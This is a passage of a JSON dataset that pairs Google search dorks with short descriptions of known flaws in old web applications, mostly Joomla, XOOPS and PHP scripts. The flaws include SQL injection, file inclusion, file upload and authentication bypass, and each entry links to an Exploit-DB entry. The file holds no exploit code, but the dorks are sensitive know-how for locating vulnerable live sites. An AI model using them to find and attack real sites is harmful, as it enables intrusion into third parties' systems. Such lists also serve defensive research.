"pages.php?id= \"Multi Vendor Mall\"", "description": "Multi Vendor Mall (itemdetail.php & shop.php) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12755"}, {"dork": "\"Search Affiliate Programs:\"", "description": "Affiliate Directory (cat_id) Remote SQL Injection Vulnerbility: https://www.exploit-db.com/exploits/5363"}, {"dork": "intitle:\"Dacio's Image Gallery\"", "description": "Dacio's Image Gallery 1.6 (DT/Bypass/SU) Remote Vulnerabilities: https://www.exploit-db.com/exploits/8653"}, {"dork": "\"Website by Spokane Web Communications\"", "description": "ArticleLive (Interspire Website Publisher) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12526"}, {"dork": "\"powered by: elkagroup\"", "description": "elkagroup SQL Injection Vulnerability - CVE: 2009-4569: https://www.exploit-db.com/exploits/10330"}, {"dork": "allinurl:/myspeach/", "description": "MySpeach 3.0.2 (my_ms[root]) Remote File Include Vulnerability - CVE: 2006-4630: https://www.exploit-db.com/exploits/2301"}, {"dork": "Powered by Revsense", "description": "RevSense (Auth bypass) Remote SQL Injection Vulnerability - CVE: 2008-6309: https://www.exploit-db.com/exploits/7163"}, {"dork": "724CMS Powered, 724CMS Version 4.59. Enterprise", "description": "724CMS Enterprise Version 4.59 SQL Injection Vulnerability - CVE: 2008-1858: https://www.exploit-db.com/exploits/12560"}, {"dork": "index.php?option=com_facileforms", "description": "Joomla Component com_facileforms 1.4.4 RFI Vulnerability - CVE: 2008-2990: https://www.exploit-db.com/exploits/5915"}, {"dork": "Powered By phUploader", "description": "phUploader Remote File Upload Vulnerability - CVE: 2007-4527: https://www.exploit-db.com/exploits/10574"}, {"dork": "inurl:\"myLDlinker.php\"", "description": "WordPress Plugin myLDlinker SQL Injection Vulnerability - CVE: 2010-2924: https://www.exploit-db.com/exploits/14441"}, {"dork": "inurl:com_idoblog", "description": "Joomla Component iDoBlog b24 Remote SQL Injection Vulnerability - CVE: 2008-2627: https://www.exploit-db.com/exploits/5730"}, {"dork": "/modules/xhresim/", "description": "XOOPS Module xhresim (index.php no) Remote SQL Injection Vuln - CVE: 2008-5665: https://www.exploit-db.com/exploits/6748"}, {"dork": "\"Powered by FubarForum v1.5\"", "description": "FubarForum 1.5 (index.php page) Local File Inclusion Vulnerability - CVE: 2008-2887: https://www.exploit-db.com/exploits/5872"}, {"dork": "/modules/amevents/print.php?id=", "description": "XOOPS Module Amevents (print.php id) SQL Injection Vulnerability - CVE: 2008-5768: https://www.exploit-db.com/exploits/7479"}, {"dork": "allinurl: com_gallery \"func\"", "description": "Mambo Component com_gallery Remote SQL Injection Vulnerability - CVE: 2008-0746: https://www.exploit-db.com/exploits/5084"}, {"dork": "\"pForum 1.29a\" OR \"\"Powie's PSCRIPT Forum 1.26\"", "description": "Powies pForum 1.29a (editpoll.php) SQL Injection Vulnerability - CVE: 2006-6038: https://www.exploit-db.com/exploits/2797"}, {"dork": "allinurl: \"/modules/myTopics/\"", "description": "XOOPS Module myTopics (articleid) Remote SQL Injection Vulnerability - CVE: 2008-0847: https://www.exploit-db.com/exploits/5148"}, {"dork": "inurl:\"com_ckforms\"", "description": "Joomla Component com_ckforms Multiple Vulnerabilities - CVE: 2010-1344: https://www.exploit-db.com/exploits/11785"}, {"dork": "allinurl:\"index.php?site=\" \"W-Agora\"", "description": "w-Agora 4.2.1 (cat) Remote SQL Injection Vulnerability - CVE: 2007-6647: https://www.exploit-db.com/exploits/4817"}, {"dork": "inurl:\"index.php?m_id=\"", "description": "slogan design Script SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12849"}, {"dork": "Powered by MVC-Web CMS inurl:/index.asp?newsid=", "description": "MVC-Web CMS 1.0/1.2 (index.asp newsid) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5912"}, {"dork": "allinurl: \"showCat.php?cat_id\"", "description": "D.E. Classifieds (cat_id) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5291"}, {"dork": "\"PhpLinkExchange v1.02\"", "description": "PhpLinkExchange v1.02 - XSS/Upload Vulerability - CVE: 2008-3679: https://www.exploit-db.com/exploits/10495"}, {"dork": "\"ClanSys v.1.1\"", "description": "Clansys v.1.1 (index.php page) PHP Code Insertion Vulnerability - CVE: 2006-2005: https://www.exploit-db.com/exploits/1710"}, {"dork": "inurl:inc_accountlistmanager.asp", "description": "DMXReady Account List Manager 1.1 Contents Change Vulnerability: https://www.exploit-db.com/exploits/7754"}, {"dork": "inurl:com_jomestate", "description": "Joomla Hot Property com_jomestate RFI Vulnerability: https://www.exploit-db.com/exploits/13956"}, {"dork": "\"Members Statistics\" +\"Total Members\" +\"Guests Online\"", "description": "AR Memberscript (usercp_menu.php) Remote File Include Vulnerability - CVE: 2006-6590: https://www.exploit-db.com/exploits/2931"}, {"dork": "\"Copyright Interactivefx.ie\"", "description": "Interactivefx.ie CMS SQL Injection Vulnerability: https://www.exploit-db.com/exploits/11873"}, {"dork": "inurl:tr.php?id= Hosting", "description": "YourFreeWorld Classifieds Hosting (id) SQL Injection Vulnerability - CVE: 2008-4884: https://www.exploit-db.com/exploits/6948"}, {"dork": "allinur:com_extended_registration", "description": "Mambo com_registration_detailed 4.1 Remote File Include - CVE: 2006-5254: https://www.exploit-db.com/exploits/2379"}, {"dork": "inurl:com_rapidrecipe \"recipe_id\"", "description": "Joomla Component rapidrecipe Remote SQL injection Vulnerability - CVE: 2008-2697: https://www.exploit-db.com/exploits/5759"}, {"dork": "\"Powered by SoftbizScripts\" \"OUR SPONSORS\"", "description": "Softbiz Link Directory Script Remote SQL Injection Vulnerability - CVE: 2007-5996: https://www.exploit-db.com/exploits/4620"}, {"dork": "Powered by PowerPortal v1.3a", "description": "PowerPortal 1.3a (index.php) Remote File Include Vulnerability - CVE: 2006-5126: https://www.exploit-db.com/exploits/2454"}, {"dork": "\"powered by kure\"", "description": "Kure 0.6.3 (index.php post,doc) Local File Inclusion Vulnerability - CVE: 2008-4632: https://www.exploit-db.com/exploits/6767"}, {"dork": "\"Liberum Help Desk, Copyright (C) 2001 Doug Luxem\"", "description": "Liberum Help Desk 0.97.3 (SQL/DD) Remote Vulnerabilities - CVE: 2008-6057: https://www.exploit-db.com/exploits/7493"}, {"dork": "inurl:modules.php?name=Shopping_Cart", "description": "PHP-Nuke Module Emporium 2.3.0 (id_catg) SQL Injection Vulnerability - CVE: 2007-1034: https://www.exploit-db.com/exploits/10615"}, {"dork": "intext:\"powered by itaco group\"", "description": "ITaco Group ITaco.biz (view_news) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/11012"}, {"dork": "mediaHolder.php?id", "description": "WordPress Media Holder (mediaHolder.php id) SQL Injection Vuln: https://www.exploit-db.com/exploits/6842"}, {"dork": "\"powered by seditio\" OR \"powered by ldu\"", "description": "Seditio CMS v121 (pfs.php) Remote File Upload Vulnerability - CVE: 2007-4057: https://www.exploit-db.com/exploits/4235"}, {"dork": "Powered By AJ Auction", "description": "AJ Auction v1 (id) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5868"}, {"dork": "\"Powered by Content Injector v1.52\"", "description": "Content Injector 1.52 (index.php cat) Remote SQL Injection Vulnerability - CVE: 2007-6137: https://www.exploit-db.com/exploits/4645"}, {"dork": "Events Calendar 1.1", "description": "Events Calendar 1.1 Remote File Inclusion Vulnerability - CVE: 2008-4673: https://www.exploit-db.com/exploits/6623"}, {"dork": "inurl:inc_linksmanager.asp", "description": "DMXReady Links Manager 1.1 Remote Contents Change Vulnerability: https://www.exploit-db.com/exploits/7772"}, {"dork": "inurl:/index.php?option=com_otzivi", "description": "Joomla Component com_otzivi Blind SQL Injection Vulnerability: https://www.exploit-db.com/exploits/10966"}, {"dork": "\"Powered by DigitalHive\"", "description": "DigitalHive 2.0 RC2 (base_include.php) Remote Include Vulnerability - CVE: 2006-5493: https://www.exploit-db.com/exploits/2566"}, {"dork": "inurl:\"com_casino_blackjack\"", "description": "Joomla Casino 0.3.1 Multiple SQL Injection - CVE: 2009-2239: https://www.exploit-db.com/exploits/8743"}, {"dork": "inurl:\"/tagit2b/\"", "description": "TagIt! Tagboard 2.1.b b2 (index.php) Remote File Include Vulnerability - CVE: 2006-5093: https://www.exploit-db.com/exploits/2450"}, {"dork": "\"powered by LionWiki \"", "description": "LionWiki 3.X (index.php) Shell Upload Vulnerability: https://www.exploit-db.com/exploits/12075"}, {"dork": "allinurl: \"index.php?area\"galid", "description": "Koobi Pro 6.25 showimages Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5414"}, {"dork": "inurl:\"tr1.php?id=\"", "description": "YourFreeWorld Scrolling Text Ads (id) SQL Injection Vulnerability - CVE: 2008-4885: https://www.exploit-db.com/exploits/6942"}, {"dork": "\"Designed by Spaceacre\"", "description": "Spaceacre Multiple SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12551"}, {"dork": "Powered by Shadowed Portal", "description": "Shadowed Portal 5.7d3 (POST) Remote File Inclusion Vulnerability: https://www.exploit-db.com/exploits/4769"}, {"dork": "\"Powered by: PhotoPost PHP 4.6.5\"", "description": "PhotoPost PHP 4.6.5 (ecard.php) SQL Injection Vulnerability - CVE: 2004-0239: https://www.exploit-db.com/exploits/14453"}, {"dork": "inurl:\"com_otzivi\"", "description": "Joomla Component com_otzivi Local File Inclusion Vulnerability: https://www.exploit-db.com/exploits/11494"}, {"dork": "\"Powered by PsNews\"", "description": "PsNews 1.1 (show.php newspath) Local File Inclusion Vulnerability - CVE: 2007-3772: https://www.exploit-db.com/exploits/4174"}, {"dork": "inurl:inc_faqsmanager.asp", "description": "DMXReady Faqs Manager 1.1 Remote Contents Change Vulnerability: https://www.exploit-db.com/exploits/7770"}, {"dork": "\"powered by sX-Shop\"", "description": "sX-Shop Multiple SQL Injection Vulnerabilities: https://www.exploit-db.com/exploits/14558"}, {"dork": "intext:'Powered by ProArcadeScript ' inurl:'game.php?id='", "description": "ProArcadeScript to Game (game) SQL Injection Vulnerability - CVE: 2010-1069: https://www.exploit-db.com/exploits/11080"}, {"dork": "inurl:tr.php?id= Downline", "description": "YourFreeWorld Downline Builder (id) Remote SQL Injection Vulnerability - CVE: 2008-4895: https://www.exploit-db.com/exploits/6935"}, {"dork": "inurl:tr.php?id= Autoresponder", "description": "YourFreeWorld Autoresponder Hosting (id) SQL Injection Vulnerability - CVE: 2008-4882: https://www.exploit-db.com/exploits/6938"}, {"dork": "inurl:\"/index.php?m=\" \"PHPRecipeBook 2.39\"", "description": "PHPRecipeBook 2.39 (course_id) Remote SQL Injection Vulnerability - CVE: 2009-4883: https://www.exploit-db.com/exploits/8330"}, {"dork": "\"powered by webClassifieds\"", "description": "webClassifieds 2005 (Auth Bypass) SQL Injection Vulnerability - CVE: 2008-5817: https://www.exploit-db.com/exploits/7602"}, {"dork": "\"Powered by SoftbizScripts\" \"ALL JOBS\"", "description": "Softbiz Jobs & Recruitment Remote SQL Injection Vulnerability - CVE: 2007-5316: https://www.exploit-db.com/exploits/4504"}, {"dork": "inurl:com_jabode", "description": "Joomla Component jabode (id) Remote SQL Injection Vulnerability - CVE: 2008-7169: https://www.exploit-db.com/exploits/5963"}, {"dork": "inurl:\"nabopoll/\"", "description": "nabopoll 1.2 Remote Unprotected Admin Section Vulnerability - CVE: 2007-0873: https://www.exploit-db.com/exploits/3305"}, {"dork": "\"Powered by CMScout \u00c2\u00a92005 CMScout Group\"", "description": "CMScout 2.05 (common.php bit) Local File Inclusion Vulnerability - CVE: 2008-3415: https://www.exploit-db.com/exploits/6142"}, {"dork": "inurl:test.php Powered by TalkBack", "description": "TalkBack 2.3.14 Multiple Remote Vulnerabilities - CVE: 2009-4854: https://www.exploit-db.com/exploits/9095"}, {"dork": "\"Powered by Ovidentia\"", "description": "Ovidentia 6.6.5 (item) Remote SQL Injection Vulnerability - CVE: 2008-3918: https://www.exploit-db.com/exploits/6232"}, {"dork": "team5 studio all rights reserved site:cn", "description": "Team 1.x (DD/XSS) Multiple Remote Vulnerabilities - CVE: 2009-0760: https://www.exploit-db.com/exploits/7982"}, {"dork": "\"powered by phpGreetCards\"", "description": "phpGreetCards XSS/Arbitrary File Upload Vulnerability - CVE: 2008-6848: https://www.exploit-db.com/exploits/7561"}, {"dork": "inurl:/wp-content/plugins/wpSS/", "description": "Wordpress Plugin Spreadsheet 0.6 SQL Injection Vulnerability - CVE: 2008-1982: https://www.exploit-db.com/exploits/5486"}, {"dork": "\"Powerd by www.e-webtech.com\"", "description": "e-webtech (new.asp?id=) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12547"}, {"dork": "inurl:inc_billboardmanager.asp?ItemID=", "description": "DMXReady Billboard Manager 1.1 Remote File Upload Vulnerability: https://www.exploit-db.com/exploits/7791"}, {"dork": "allinurl :\"modules/recipe\"", "description": "XOOPS Module Recipe (detail.php id) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5473"}, {"dork": "\"powered by php advanced transfer manager\"", "description": "phpAtm 1.30 (downloadfile) Remote File Disclosure Vulnerability - CVE: 2007-2659: https://www.exploit-db.com/exploits/3918"}, {"dork": "\"Powered by GeN4\"", "description": "PTCPay GEN4 (buyupg.php) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14086"}, {"dork": "\"Powered By Gravity Board X v2.0 BETA\"", "description": "Gravity Board X 2.0b SQL Injection / Post Auth Code Execution - CVE: 2008-2996: https://www.exploit-db.com/exploits/8350"}, {"dork": "inurl:com_flippingbook", "description": "Joomla Component FlippingBook 1.0.4 SQL Injection Vulnerability - CVE: 2008-2095: https://www.exploit-db.com/exploits/5484"}, {"dork": "\"Powered by vlBook 1.21\"", "description": "vlBook 1.21 (XSS/LFI) Multiple Remote Vulnerabilities - CVE: 2008-2073: https://www.exploit-db.com/exploits/5529"}, {"dork": "Copyright \u00c2\u00a9 Rotator 2008", "description": "YourFreeWorld URL Rotator (id) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/6949"}, {"dork": "inurl:tr.php?id= Reminder Service", "description": "YourFreeWorld Reminder Service (id) SQL Injection Vulnerability - CVE: 2008-4881: https://www.exploit-db.com/exploits/6943"}, {"dork": "\"Jevonweb Guestbook\"", "description": "Jevonweb Guestbook Remote Admin Access: https://www.exploit-db.com/exploits/10665"}, {"dork": "inurl:inc_contactusmanager.asp", "description": "DMXReady Contact Us Manager 1.1 Remote Contents Change Vuln: https://www.exploit-db.com/exploits/7768"}, {"dork": "inurl:com_neorecruit", "description": "Joomla Component com_neorecruit 1.4 SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14570"}, {"dork": "\"index.php?option=com_mdigg\"", "description": "Joomla Component com_mdigg SQL Injection Vulnerability: https://www.exploit-db.com/exploits/10847"}, {"dork": "\"Uploader by CeleronDude.\"", "description": "Uploader by CeleronDude 5.3.0 - Upload Vulnerability: https://www.exploit-db.com/exploits/11166"}, {"dork": "'SEO by NuSEO.PHP'", "description": "NuSEO PHP Enterprise 1.6 Remote File Inclusion Vulnerability - CVE: 2007-5409: https://www.exploit-db.com/exploits/4512"}, {"dork": "powered by zeeways", "description": "Zeeways Technology (product_desc.php) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/11047"}, {"dork": "intitle:\"Shorty (Beta)\"", "description": "Shorty 0.7.1b (Auth Bypass) Insecure Cookie Handling Vulnerability: https://www.exploit-db.com/exploits/9419"}, {"dork": "inurl:index.php?mod=ConcoursPhoto", "description": "KwsPHP Module ConcoursPhoto (C_ID) SQL Injection Vulnerability - CVE: 2008-1758: https://www.exploit-db.com/exploits/5353"}, {"dork": "\"Copyright MaxiSepet \u00a9\"", "description": "MaxiSepet 1.0 (link) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/1900"}, {"dork": "Powered by sabros.us", "description": "sabros.us 1.75 (thumbnails.php) Remote File Disclosure Vulnerability - CVE: 2008-1799: https://www.exploit-db.com/exploits/5360"}, {"dork": "inurl:inc_registrationmanager.asp", "description": "DMXReady Registration Manager 1.1 Contents Change Vulnerability: https://www.exploit-db.com/exploits/7784"}, {"dork": "\"You have not provided a survey identification number\"", "description": "LimeSurvey 1.52 (language.php) Remote File Inclusion Vulnerability - CVE: 2007-5573: https://www.exploit-db.com/exploits/4544"}, {"dork": "\"Powered by ComicShout\"", "description": "ComicShout 2.8 (news.php news_id) SQL Injection Vulnerability - CVE: 2008-6425: https://www.exploit-db.com/exploits/5713"}, {"dork": "powered by Pixaria. Gallery", "description": "Pixaria Gallery 1.x (class.Smarty.php) Remote File Include Vulnerability - CVE: 2007-2457: https://www.exploit-db.com/exploits/3733"}, {"dork": "\"Powered by FlashGameScript\"", "description": "FlashGameScript 1.7 (user) Remote SQL Injection Vulnerability - CVE: 2007-3646: https://www.exploit-db.com/exploits/4161"}, {"dork": "index.php?option=com_ongallery", "description": "Joomla Component OnGallery SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14659"}, {"dork": "\"This website is powered by Trio\"", "description": "TriO 2.1 (browse.php id) Remote SQL Injection Vulnerability - CVE: 2008-3418: https://www.exploit-db.com/exploits/6141"}, {"dork": "content_by_cat.asp?contentid ''catid''", "description": "ASPapp KnowledgeBase (catid) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/6590"}, {"dork": "browse_videos.php?", "description": "phpVID 0.9.9 (categories_type.php cat) SQL Injection Vulnerability - CVE: 2007-3610: https://www.exploit-db.com/exploits/4153"}, {"dork": "inurl:JBSPro", "description": "JiRos Banner Experience 1.0 (Create Admin Bypass) - CVE: 2006-1213: https://www.exploit-db.com/exploits/1571"}, {"dork": "inurl:inc_joblistingmanager.asp", "description": "DMXReady Job Listing 1.1 Remote Contents Change Vulnerability: https://www.exploit-db.com/exploits/7771"}, {"dork": "Maintained with the Ocean12 Contact Manager Pro v1.02", "description": "Ocean12 Contact Manager Pro (SQL/XSS/DDV) Multiple Vulnerabilities - CVE: 2008-6369: https://www.exploit-db.com/exploits/7244"}, {"dork": "buyers_subcategories.php?IndustryID=", "description": "Softbiz B2B trading Marketplace Script buyers_subcategories SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12245"}, {"dork": "\"Powered by Minerva\"", "description": "Minerva 2.0.21 build 238a (phpbb_root_path) File Include Vulnerability - CVE: 2006-5077: https://www.exploit-db.com/exploits/2429"}, {"dork": "inurl:\"izle.asp?oyun=\"", "description": "FoT Video scripti 1.1b (oyun) Remote SQL Injection Vulnerability - CVE: 2008-4176: https://www.exploit-db.com/exploits/6453"}, {"dork": "Copyright \u00c2\u00a9 Viral Marketing 2008", "description": "YourFreeWorld Viral Marketing (id) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/6941"}, {"dork": "inurl:\"IDFM=\" \"form.php\"", "description": "360 Web Manager 3.0 (IDFM) SQL Injection Vulnerability - CVE: 2008-0430: https://www.exploit-db.com/exploits/4944"}, {"dork": "inurl:inc_newsmanager.asp", "description": "DMXReady News Manager 1.1 Arbitrary Category Change Vuln: https://www.exploit-db.com/exploits/7752"}, {"dork": "Powered by Arctic v2.0.0", "description": "Artic Issue Tracker 2.0.0 (index.php filter) SQL Injection Vulnerability - CVE: 2008-3250: https://www.exploit-db.com/exploits/6097"}, {"dork": "Powered by: Zanfi Solutions", "description": "Zanfi CMS lite 1.2 Multiple Local File Inclusion Vulnerabilities - CVE: 2008-4158: https://www.exploit-db.com/exploits/6413"}, {"dork": "\"Powered by SiteX 0.7 Beta\"", "description": "SiteX 0.7.4.418 (THEME_FOLDER) Local File Inclusion Vulnerabilities - CVE: 2009-1846: https://www.exploit-db.com/exploits/8816"}, {"dork": "inurl:\"freshlinks_panel/index.php?linkid\"", "description": "PHP-Fusion Mod freshlinks (linkid) Remote SQL Injection Vuln - CVE: 2008-5074: https://www.exploit-db.com/exploits/6620"}, {"dork": "Powered By WebSihirbaz\u00c4\u00b1", "description": "WebSihirbazi 5.1.1 (pageid) Remote SQL Injection Vulnerability - CVE: 2007-6556: https://www.exploit-db.com/exploits/4777"}, {"dork": "inurl:inc_paypalstoremanager.asp", "description": "DMXReady PayPal Store Manager 1.1 Contents Change Vulnerability: https://www.exploit-db.com/exploits/7782"}, {"dork": "Powered By phpCOIN 1.2.3", "description": "phpCOIN 1.2.3 (session_set.php) Remote Include Vulnerability - CVE: 2006-4424: https://www.exploit-db.com/exploits/2254"}, {"dork": "Powered By: \u00a9 Simplicity oF Upload", "description": "Simplicity oF Upload (1.3.2) Remote File Upload Vulnerability - CVE: 2009-4818: https://www.exploit-db.com/exploits/10568"}, {"dork": "\"Developed by Quate.net.\"", "description": "Grape Statistics 0.2a (location) Remote File Inclusion Vulnerability - CVE: 2008-1963: https://www.exploit-db.com/exploits/5463"}, {"dork": "allinurl:directory.php?ax=list", "description": "Prozilla Directory Script (directory.php cat_id) SQL Injection Vulnerbility - CVE: 2007-3809: https://www.exploit-db.com/exploits/4185"}, {"dork": "inurl:w3.php?nodeId=", "description": "Aspect Ratio CMS Blind SQL Injection Vulnerability: https://www.exploit-db.com/exploits/15205"}, {"dork": "VS-G\u00e4stebuch V. \u00a9", "description": "S-Gastebuch 1.5.3 (gb_pfad) Remote File Include - CVE: 2007-1011: https://www.exploit-db.com/exploits/3328"}, {"dork": "Uebimiau Webmail v3.2.0-1.8", "description": "Uebimiau Web-Mail v3.2.0-1.8 Remote File / Overwrite Vulnerabilities: https://www.exploit-db.com/exploits/8944"}, {"dork": "\"ATutor 1.6.4\"", "description": "ATutor 1.6.4 Multiple Cross Site Scripting - CVE: 2010-0971: https://www.exploit-db.com/exploits/11685"}, {"dork": "\"Search | Invite | Mail | Blog | Forum\"", "description": "Myspace Clone Script Remote SQL Injection Vulnerability - CVE: 2007-5992: https://www.exploit-db.com/exploits/4622"}, {"dork": "elkagroup - Image Gallery v1.0 - All right reserved", "description": "elkagroup Image Gallery 1.0 Arbitrary File Upload Vulnerability - CVE: 2009-1446: https://www.exploit-db.com/exploits/8514"}, {"dork": "intext:\"Powered by CLscript.com\"", "description": "CLScript.com Classifieds Software SQL Injection Vunerability - CVE: 2010-1660: https://www.exploit-db.com/exploits/12423"}, {"dork": "inurl:\"index.php?option=com_oziogallery\"", "description": "Joomla Ozio Gallery Component (com_oziogallery) SQL Injection Vulnerability - CVE: 2010-2910: https://www.exploit-db.com/exploits/14462"}, {"dork": "\"Powered by Content Injector v1.53\"", "description": "Content Injector 1.53 (index.php) Remote SQL Injection Vulnerability - CVE: 2007-6394: https://www.exploit-db.com/exploits/4706"}, {"dork": "inurl:\"click.php?hostid=\"", "description": "Adult Banner Exchange Website (targetid) SQL Injection Vulnerability - CVE: 2008-6101: https://www.exploit-db.com/exploits/6909"}, {"dork": "inurl:/tiny_mce/plugins/filemanager/", "description": "TinyMCE MCFileManager 2.1.2 Arbitrary File Upload Vulnerability: https://www.exploit-db.com/exploits/15194"}, {"dork": "inurl:\"search_results.php?browse=1\"", "description": "SoftBizScripts Dating Script SQL Injection Vunerability - CVE: 2006-3271: https://www.exploit-db.com/exploits/12438"}, {"dork": "\"powered by fuzzylime\"", "description": "fuzzylime cms 3.01 (admindir) Remote File Inclusion Vulnerability - CVE: 2008-1405: https://www.exploit-db.com/exploits/5260"}, {"dork": "Powered by ThinkAdmin", "description": "ThinkAdmin (page.php) Sql Injection Vulnerability: https://www.exploit-db.com/exploits/11296"}, {"dork": "phpBazar Ver. 2.1.0", "description": "phpBazar-2.1.1fix Remote Administration-Panel Vulnerability - CVE: 2009-4222: https://www.exploit-db.com/exploits/10233"}, {"dork": "inurl:gotourl.php?id=", "description": "PozScripts Classified Auctions (gotourl.php id) SQL Injection Vuln - CVE: 2008-4755: https://www.exploit-db.com/exploits/6839"}, {"dork": "inurl:\"module=helpcenter\"", "description": "Help Center Live 2.0.6(module=helpcenter&file=) Local File Inclusion - CVE: 2010-1652: https://www.exploit-db.com/exploits/12421"}, {"dork": "Powered By PHPhotoalbum", "description": "PHPhotoalbum Remote File Upload Vulnerability - CVE: 2009-4819: https://www.exploit-db.com/exploits/10584"}, {"dork": "\"Gallery powered by fMoblog\"", "description": "Wordpress Plugin fMoblog 2.1 (id) SQL Injection Vulnerability - CVE: 2009-0968: https://www.exploit-db.com/exploits/8229"}, {"dork": "\"Powered by Orca Interactive Forum Script\"", "description": "Orca 2.0/2.0.2 (params.php) Remote File Inclusion Vulnerability - CVE: 2008-5167: https://www.exploit-db.com/exploits/5955"}, {"dork": "inurl:\"browsecats.php?cid=\"", "description": "SoftBizScripts Hosting Script SQL Injection Vunerability - CVE: 2005-3817: https://www.exploit-db.com/exploits/12439"}, {"dork": "\"Powered by MySpace Content Zone\"", "description": "MySpace Content Zone 3.x Remote File Upload Vulnerability - CVE: 2007-6668: https://www.exploit-db.com/exploits/4741"}, {"dork": "allinurl: \"com_actualite\"", "description": "Joomla Component actualite 1.0 (id) SQL Injection Vulnerability - CVE: 2008-4617: https://www.exploit-db.com/exploits/5337"}, {"dork": "inurl:\"com_book\"", "description": "Joomla Component com_book SQL injection Vulnerability: https://www.exploit-db.com/exploits/11213"}, {"dork": "\"powered by AllMyGuests\"", "description": "AllMyGuests 0.4.1 (AMG_id) Remote SQL Injection Vulnerability - CVE: 2008-1961: https://www.exploit-db.com/exploits/5469"}, {"dork": "allinurl : /web3news/", "description": "Web3news 0.95 (PHPSECURITYADMIN_PATH) Remote Include Vuln - CVE: 2006-4452: https://www.exploit-db.com/exploits/2269"}, {"dork": "Powered by BoutikOne\u00ae", "description": "BoutikOne v1 SQL Injection Vulnerability - CVE: 2010-3479: https://www.exploit-db.com/exploits/15049"}, {"dork": "\" Powered by Xpoze \"", "description": "Xpoze 4.10 (home.html menu) Blind SQL Injection Vulnerability - CVE: 2008-6352: https://www.exploit-db.com/exploits/7432"}, {"dork": "allinurl:\"macgurublog.php?uid=\"", "description": "e107 Plugin BLOG Engine 2.1.4 Remote SQL Injection Vulnerability - CVE: 2008-6438: https://www.exploit-db.com/exploits/6856"}, {"dork": "powered by AirvaeCommerce 3.0", "description": "AirvaeCommerce 3.0 (pid) Remote SQL Injection Vulnerability - CVE: 2008-5223: https://www.exploit-db.com/exploits/5689"}, {"dork": "inurl: \"tops_top.php? id_cat =\"", "description": "Million Pixels 3 (id_cat) Remote SQL Injection Vulnerability - CVE: 2008-3204: https://www.exploit-db.com/exploits/6044"}, {"dork": "PHPEmailManager", "description": "PHP Email Manager (remove.php ID) SQL Injection Vulnerability - CVE: 2009-3209: https://www.exploit-db.com/exploits/9470"}, {"dork": "\"Powered by ExBB \"", "description": "ExBB Italiano 0.2 exbb[home_path] Remote File Include Vulnerability - CVE: 2006-4488: https://www.exploit-db.com/exploits/2273"}, {"dork": "\"Powered by Locazolist Copyright \u00a9 2006\"", "description": "LocazoList 2.01a beta5 (subcatID) Remote SQL Injection Vulnerability - CVE: 2007-0129: https://www.exploit-db.com/exploits/3073"}, {"dork": "\"txx cms\"", "description": "Txx CMS 0.2 Multiple Remote File Inclusion Vulnerabilities - CVE: 2007-4819: https://www.exploit-db.com/exploits/4381"}, {"dork": "inurl:\"printer.asp?forum=\"", "description": "ASP Message Board 2.2.1c Remote SQL Injection Vulnerability - CVE: 2007-5887: https://www.exploit-db.com/exploits/4609"}, {"dork": "inurl:\"com_ownbiblio\" catalogue", "description": "Joomla Component ownbiblio 1.5.3 (catid) SQL Injection Vulnerability - CVE: 2008-6184: https://www.exploit-db.com/exploits/6730"}, {"dork": "\"CMS Webmanager-pro\"", "description": "CMS WebManager-Pro Multiple Remote SQL Injection Vulnerabilities - CVE: 2008-2351: https://www.exploit-db.com/exploits/5641"}, {"dork": "inurl:\"/geeklog/\"", "description": "GeekLog 1.7.0 (fckeditor) Arbitrary File Upload Vulnerability: https://www.exploit-db.com/exploits/15277"}, {"dork": "inurl:/webCal3_detail.asp?event_id=", "description": "WebCal (webCal3_detail.asp event_id) SQL Injection Vulnerability - CVE: 2009-1945: https://www.exploit-db.com/exploits/8857"}, {"dork": "inurl:classifieds/view.php?category=", "description": "YourFreeWorld Classifieds (category) Remote SQL Injection Vulnerability - CVE: 2008-3755: https://www.exploit-db.com/exploits/6945"}, {"dork": "\"Signkorn Guestbook 1.3\"", "description": "Signkorn Guestbook 1.3 (dir_path) Remote File Include Vulnerability - CVE: 2006-4788: https://www.exploit-db.com/exploits/2354"}, {"dork": "inurl:\"powered by eggblog\"", "description": "Eggblog 3.07 Remote (SQL Injection / Privilege Escalation) - CVE: 2006-2725: https://www.exploit-db.com/exploits/1842"}, {"dork": "\"pForum 1.30\"", "description": "pForum 1.30 (showprofil.php id) Remote SQL Injection Vulnerability - CVE: 2008-4355: https://www.exploit-db.com/exploits/6442"}, {"dork": "Powered By AJ Auction", "description": "AJ Auction Pro Platinum (seller_id) SQL Injection Vulnerability - CVE: 2008-6004: https://www.exploit-db.com/exploits/6561"}, {"dork": "faqview.asp?key", "description": "Techno Dreams FAQ Manager 1.0 Remote SQL Injection Vulnerability - CVE: 2006-4892: https://www.exploit-db.com/exploits/2385"}, {"dork": "\"Powered by: MFH v1\"", "description": "Mega File Hosting Script 1.2 (fid) Remote SQL Injection Vulnerability - CVE: 2008-2521: https://www.exploit-db.com/exploits/5598"}, {"dork": "inurl:\"com_beamospetition\"", "description": "Joomla Component (com_beamospetition) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14502"}, {"dork": "\"Powered By 4smart\"", "description": "Magician Blog 1.0 (ids) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/9282"}, {"dork": "inurl :/PhotoCart/", "description": "Photo Cart 3.9 (adminprint.php) Remote File Include Vulnerability - CVE: 2006-6093: https://www.exploit-db.com/exploits/2817"}, {"dork": "\"Powered by GetMyOwnArcade\"", "description": "GetMyOwnArcade (search.php query) Remote SQL Injection Vulnerability - CVE: 2007-4386: https://www.exploit-db.com/exploits/4291"}, {"dork": "Powered By : PersianBB.com", "description": 